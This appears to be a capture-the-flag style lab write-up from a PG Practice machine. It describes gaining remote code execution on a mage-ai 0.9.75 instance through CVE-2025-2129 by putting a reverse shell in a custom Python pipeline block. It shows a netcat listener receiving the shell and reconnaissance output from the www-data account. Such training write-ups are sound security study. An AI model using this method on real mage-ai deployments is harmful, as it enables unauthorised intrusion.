InfoSec LAB

Remote Code Execution

The target mage-ai instance has been identified to be vulnerable to CVE-2025-2129 due to its outdated version; 0.9.75

Creating a new pipeline; CVE-2025-2129

Then I will create a new custom Python block

A new Python block has been created with a default content inside.

I will replace the content with a reverse shell

Then simply, clicking into the run the block

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/zab]
└─$ nnc 9999                                                                   
listening on [any] 9999 ...
connect to [192.168.45.155] from (UNKNOWN) [192.168.239.210] 40280
bash: cannot set terminal process group (1311): Inappropriate ioctl for device
bash: no job control in this shell
www-data@zab:~/html$ whoami
whoami
www-data
www-data@zab:~/html$ hostname
hostname
zab
www-data@zab:~/html$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:9e:04:3d brd ff:ff:ff:ff:ff:ff
    altname enp11s0
    inet 192.168.239.210/24 brd 192.168.239.255 scope global ens192
       valid_lft forever preferred_lft forever

Initial Foothold established to the target system as thee www-data account via exploiting CVE-2025-2129

InfoSec LAB

Explorer

Zab_Exploitation

Remote Code Execution

Interactive Graph View

Backlinks